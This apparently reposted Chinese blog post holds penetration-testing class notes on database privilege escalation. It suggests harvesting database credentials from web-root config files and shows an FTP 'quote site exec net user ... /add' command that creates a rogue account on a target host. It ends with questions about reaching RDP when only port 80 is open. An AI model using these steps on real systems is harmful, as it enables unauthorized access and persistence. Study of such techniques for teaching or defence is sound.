网络安全渗透第9节课笔记
作者:互联网
数据库提权中如何获得数据库的管理员账号和密码?
可以在网站的根目录中找和数据库有关的配置文件.config,一般会有连接数据库的账号和密码。
远程利用目标主机文件执行权限执行命令:
攻击机在cmd命令行输入
ftp
open 192.168.18.11
目标主机密码
quote site exec net user zjj 123 /add
执行成功没有返回结果。
提权后如何渗透内网?
假设目标主机防火墙策略仅开放80端口,攻击者通过80端口在目标主机创建账号,但远程登录端口号是3389,如何实现远程登录?
标签:网络安全,80,账号,主机,数据库,笔记,提权,节课,远程 来源: https://www.cnblogs.com/123456ZJJ/p/12930049.html